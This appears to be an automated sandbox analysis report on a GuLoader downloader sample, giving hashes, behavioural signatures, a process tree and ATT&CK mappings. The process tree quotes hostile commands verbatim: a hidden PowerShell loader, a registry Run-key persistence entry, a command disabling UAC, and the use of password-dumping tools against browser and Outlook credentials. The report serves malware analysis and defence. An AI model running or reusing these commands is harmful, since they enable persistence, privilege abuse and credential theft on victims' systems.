Analysis
-
max time kernel
149s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20240704-en -
resource tags
arch:x64arch:x86image:win10v2004-20240704-enlocale:en-usos:windows10-2004-x64system -
submitted
09-07-2024 11:16
Static task
static1
Behavioral task
behavioral1
Sample
MalwareBazaar.exe
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
MalwareBazaar.exe
Resource
win10v2004-20240704-en
General
-
Target
MalwareBazaar.exe
-
Size
401KB
-
MD5
f1043033237fa935ef9af72415e657a1
-
SHA1
b1ce2973b99811fe469ae6b4c450e97d4d4f4a20
-
SHA256
a03913b0dcf4d9707eb9c74d69b522927e760e9be55effb0e14ebbbaad9177c7
-
SHA512
1f4971262c297f2fa58234d7787ea384a168633eadce39e9334d9e7f5e5924b40eb47b84cc83ec8c29c62212863f17340a5525007d25f721c900e5583cf8dd3b
-
SSDEEP
6144:FM23AboMfTvNXDQV1yKE2C7qNIZX8il32bcHXgjv3bO43f1WYq6cVjWZSlhhEV:nGoGNzQ+DZX8M2bc3Av3bO43tW5WZl
Malware Config
Signatures
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
NirSoft MailPassView 1 IoCs
Password recovery tool for various email clients
Processes:
resource yara_rule behavioral2/memory/208-72-0x0000000000400000-0x0000000000462000-memory.dmp MailPassView -
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
Processes:
resource yara_rule behavioral2/memory/4948-71-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView -
Nirsoft 3 IoCs
Processes:
resource yara_rule behavioral2/memory/2844-73-0x0000000000400000-0x0000000000424000-memory.dmp Nirsoft behavioral2/memory/208-72-0x0000000000400000-0x0000000000462000-memory.dmp Nirsoft behavioral2/memory/4948-71-0x0000000000400000-0x0000000000478000-memory.dmp Nirsoft -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
Processes:
wab.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-661257284-3186977026-4220467887-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts wab.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-661257284-3186977026-4220467887-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Startup key = "%pantstnings% -windowstyle minimized $Uselessness=(Get-ItemProperty -Path 'HKCU:\\Chet\\').Ruelike;%pantstnings% ($Uselessness)" reg.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
Processes:
wab.exepid process 3188 wab.exe 3188 wab.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
powershell.exewab.exepid process 2952 powershell.exe 3188 wab.exe -
Suspicious use of SetThreadContext 4 IoCs
Processes:
powershell.exewab.exedescription pid process target process PID 2952 set thread context of 3188 2952 powershell.exe wab.exe PID 3188 set thread context of 4948 3188 wab.exe wab.exe PID 3188 set thread context of 208 3188 wab.exe wab.exe PID 3188 set thread context of 2844 3188 wab.exe wab.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry key 1 TTPs 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 16 IoCs
Processes:
powershell.exewab.exewab.exepid process 2952 powershell.exe 2952 powershell.exe 2952 powershell.exe 2952 powershell.exe 2952 powershell.exe 2952 powershell.exe 2952 powershell.exe 2952 powershell.exe 2952 powershell.exe 2952 powershell.exe 4948 wab.exe 4948 wab.exe 2844 wab.exe 2844 wab.exe 4948 wab.exe 4948 wab.exe -
Suspicious behavior: MapViewOfSection 4 IoCs
Processes:
powershell.exewab.exepid process 2952 powershell.exe 3188 wab.exe 3188 wab.exe 3188 wab.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exewab.exedescription pid process Token: SeDebugPrivilege 2952 powershell.exe Token: SeDebugPrivilege 2844 wab.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
wab.exepid process 3188 wab.exe -
Suspicious use of WriteProcessMemory 32 IoCs
Processes:
MalwareBazaar.exepowershell.exewab.execmd.execmd.exedescription pid process target process PID 2456 wrote to memory of 2952 2456 MalwareBazaar.exe powershell.exe PID 2456 wrote to memory of 2952 2456 MalwareBazaar.exe powershell.exe PID 2456 wrote to memory of 2952 2456 MalwareBazaar.exe powershell.exe PID 2952 wrote to memory of 3188 2952 powershell.exe wab.exe PID 2952 wrote to memory of 3188 2952 powershell.exe wab.exe PID 2952 wrote to memory of 3188 2952 powershell.exe wab.exe PID 2952 wrote to memory of 3188 2952 powershell.exe wab.exe PID 2952 wrote to memory of 3188 2952 powershell.exe wab.exe PID 3188 wrote to memory of 1692 3188 wab.exe cmd.exe PID 3188 wrote to memory of 1692 3188 wab.exe cmd.exe PID 3188 wrote to memory of 1692 3188 wab.exe cmd.exe PID 1692 wrote to memory of 1776 1692 cmd.exe reg.exe PID 1692 wrote to memory of 1776 1692 cmd.exe reg.exe PID 1692 wrote to memory of 1776 1692 cmd.exe reg.exe PID 3188 wrote to memory of 2912 3188 wab.exe cmd.exe PID 3188 wrote to memory of 2912 3188 wab.exe cmd.exe PID 3188 wrote to memory of 2912 3188 wab.exe cmd.exe PID 2912 wrote to memory of 5068 2912 cmd.exe reg.exe PID 2912 wrote to memory of 5068 2912 cmd.exe reg.exe PID 2912 wrote to memory of 5068 2912 cmd.exe reg.exe PID 3188 wrote to memory of 4948 3188 wab.exe wab.exe PID 3188 wrote to memory of 4948 3188 wab.exe wab.exe PID 3188 wrote to memory of 4948 3188 wab.exe wab.exe PID 3188 wrote to memory of 4948 3188 wab.exe wab.exe PID 3188 wrote to memory of 208 3188 wab.exe wab.exe PID 3188 wrote to memory of 208 3188 wab.exe wab.exe PID 3188 wrote to memory of 208 3188 wab.exe wab.exe PID 3188 wrote to memory of 208 3188 wab.exe wab.exe PID 3188 wrote to memory of 2844 3188 wab.exe wab.exe PID 3188 wrote to memory of 2844 3188 wab.exe wab.exe PID 3188 wrote to memory of 2844 3188 wab.exe wab.exe PID 3188 wrote to memory of 2844 3188 wab.exe wab.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\MalwareBazaar.exe"C:\Users\Admin\AppData\Local\Temp\MalwareBazaar.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2456 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Vindflj=Get-Content 'C:\Users\Admin\AppData\Roaming\annekskirkers\dommedagens\nonmenial\delysten.imp';$Byggryn=$Vindflj.SubString(71093,3);.$Byggryn($Vindflj)"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2952 -
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"3⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3188 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%pantstnings% -windowstyle minimized $Uselessness=(Get-ItemProperty -Path 'HKCU:\Chet\').Ruelike;%pantstnings% ($Uselessness)"4⤵
- Suspicious use of WriteProcessMemory
PID:1692 -
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%pantstnings% -windowstyle minimized $Uselessness=(Get-ItemProperty -Path 'HKCU:\Chet\').Ruelike;%pantstnings% ($Uselessness)"5⤵
- Adds Run key to start application
- Modifies registry key
PID:1776 -
C:\Windows\SysWOW64\cmd.exe/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f4⤵
- Suspicious use of WriteProcessMemory
PID:2912 -
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f5⤵
- UAC bypass
- Modifies registry key
PID:5068 -
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\eqvzfosugnwwqzscdxvnwhyeyf"4⤵
- Suspicious behavior: EnumeratesProcesses
PID:4948 -
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\pkakggdouvojafgguiiozutvhmvho"4⤵
- Accesses Microsoft Outlook accounts
PID:208 -
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\rmochzopidgodtcsdsvikznepafihxzbm"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2844
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4112,i,3409420486566309625,12100452682816721435,262144 --variations-seed-version --mojo-platform-channel-handle=4032 /prefetch:81⤵PID:1456
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
144B
MD54496987350b4a169bec8278ece79cb10
SHA18ff5a04d767b629fd84994aea45f1220ff917e74
SHA256945ba0e98daefbf99b29b2c5f06e616bb3cc42d4b802e3111a7581a6acf5e821
SHA51261ee8b463e918b47fb1c4496cab11adecd72eeb49dfbd33a676ac694958a20edacf40d0846a575f223032ca1310c8cd8f2142a5dec17ecd5ff74c30a3a719ba4
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
4KB
MD5be3be306ce816aa6030d9bfec1df34b0
SHA166b10c4578245de0f78c445119e67f0bfb84bbf3
SHA2560c38ee44dc9eb4f240b667240c115fed88091bc04001d909b841ad8570738467
SHA512b9aee88755e6e239c7aa1d3c39488722786c1faa01de3c70cf822059f461ca277965b8dd50773e015444a83cc69b5f31c6379957de54a5073ef8799b26a12bcc
-
Filesize
350KB
MD5be381f7baf52513e52dfed9361a6dc69
SHA1a6cdb30ea1a85a42404e6e2fd29c8d5cc6ad251a
SHA256caceb5002866580c07883f8fddb62a82d7fadd1e8ca7a2eb4e11240dfda94d79
SHA512c076aa00785538010dcc9df6aaba0f8af5f130b7edc800fca31da4fff9ee11fa728ba5c78c89047494b0536878d8b32d3f05f43177dacf0416726b02af814c8a
-
Filesize
69KB
MD58172795f7c8cfb7cc597e879d2b0b468
SHA1811797a9309a1bc3429f3bc7735eb6af1a7c80dc
SHA2565339721e47b9ac3dfb81b6d81593e9792c57573541918c0d5ca327128aa4345c
SHA5129718f72091367ed6a02598295a9f35512c6ddb31e3dae9b685060e613c942c755d90418cb4ea31e4bf7ea8967ce34c9356bbf53fafe08a31d851afddd55d7322